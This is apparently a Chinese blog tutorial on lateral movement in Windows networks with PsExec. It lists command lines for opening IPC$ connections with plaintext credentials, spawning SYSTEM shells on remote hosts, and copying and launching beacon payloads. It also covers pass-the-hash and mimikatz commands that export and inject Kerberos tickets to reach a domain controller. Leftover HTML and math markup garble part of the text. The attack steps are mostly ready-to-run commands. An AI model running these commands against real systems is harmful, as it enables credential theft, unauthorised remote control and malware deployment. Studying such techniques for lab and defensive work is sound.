内网渗透-【横向移动】PsExec工具远程命令执行横向移动

【横向移动】PsExec工具远程命令执行横向移动

在这里插入图片描述

PsExec介绍

psexec 是 windows 下非常好的一款远程命令行工具。 psexec的使用不需要对方主机开方3389端口, 只需要对方开启admin

     共享和 
    
   
     i 
    
   
     p 
    
   
     c 
    
   
  
    共享和ipc 
   
  
</span><span class="katex-html"><span class="base"><span class="strut" style="height: 0.8778em; vertical-align: -0.1944em;"></span><span class="mord cjk_fallback">共享和</span><span class="mord mathnormal">i</span><span class="mord mathnormal">p</span><span class="mord mathnormal">c</span></span></span></span></span> (该共享默认开启,依赖于<a href="https://so.csdn.net/so/search?q=445%E7%AB%AF%E5%8F%A3&amp;spm=1001.2101.3001.7020" target="_blank" class="hl hl-1" data-report-view="{&quot;spm&quot;:&quot;1001.2101.3001.7020&quot;,&quot;dest&quot;:&quot;https://so.csdn.net/so/search?q=445%E7%AB%AF%E5%8F%A3&amp;spm=1001.2101.3001.7020&quot;,&quot;extra&quot;:&quot;{\&quot;searchword\&quot;:\&quot;445端口\&quot;}&quot;}" data-report-click="{&quot;spm&quot;:&quot;1001.2101.3001.7020&quot;,&quot;dest&quot;:&quot;https://so.csdn.net/so/search?q=445%E7%AB%AF%E5%8F%A3&amp;spm=1001.2101.3001.7020&quot;,&quot;extra&quot;:&quot;{\&quot;searchword\&quot;:\&quot;445端口\&quot;}&quot;}" data-tit="445端口" data-pretit="445端口">445端口</a>)。</p> 

但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。

由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中

下载地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools 在这里插入图片描述

PsExec使用条件

1、具有正确的凭证(内存凭证、账号密码、账号NTLM Hash)
2、能建立IPC链接(也就是需要通过smb认证的),且目标机器开启了共享(默认开启的),并且目标 共享中必须有admin$共享

PsExec常用参数

psexec \ip -u administrator -p admin cmd 进⼊半交互式shell
PsExec -accepteula \192.168.108.101 -s cmd.exe 建立交互的shell
psexec \ip - uadministrator -p admin -w c:\cmd 进⼊交互式shell,且c:\是⽬标机器的⼯作⽬录
psexec \ip -u administrator -p admin whoami all 执行命令
psexec \ip -u administrator -p admin -d c:\beacon.exe 执行文件
psexec \ip -u administrator -p admin -h -d c:\beacon.exe UAC的⽤⼾权限执行文件

实验复现

4.1、IPC$下的psexec

上传psexec

在这里插入图片描述

建立IPC$连接

net use \192.168.41.150\ipc$ “Admin@123” /user:administrator
在这里插入图片描述

返回交互的shell或者执行命令

psexec.exe -accepteula \192.168.41.150 -s cmd.exe 返回交互shell (必须是msf或者远程 到桌面CS不行)
psexec.exe -accepteula \192.168.41.150 -s ipconfig 远程执行命令
在这里插入图片描述
在这里插入图片描述
远程复制

copy C:\Users\admin\Desktop\wanli.exe \192.168.41.150\C$

在这里插入图片描述

远程上线

psexec.exe -accepteula \192.168.41.150 -h -d c:\wanli.exe
在这里插入图片描述

4.2、PTH下的psexecs

找到登录的凭证在这里插入图片描述
找到和扫描地址在这里插入图片描述
进行psexec攻击上线在这里插入图片描述

4.3、PTT下的psexec

上传psexec

在这里插入图片描述

进行PTT攻击
导出内存的票据

mimikatz.exe “privilege::debug” “sekurlsa::tickets /export”

在这里插入图片描述

清除内存中的票据

shell klist purge
mimikatz kerberos::purge
两个都是清除票据

将高权限的票据文件注入内存

mimikatz kerberos::ptt [0;998d7]-2-0-40e10000-Administrator@krbtgt-
HACK.COM.kirbi

查看票据

shell klist
mimikatz kerberos::tgt

远程复制

copy C:\Users\admin\Desktop\wanli.exe \dc.hack.com\C$

在这里插入图片描述

远程上线

psexec.exe \dc.hack.com -h -d c:\wanli.exe

在这里插入图片描述

  • 29
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值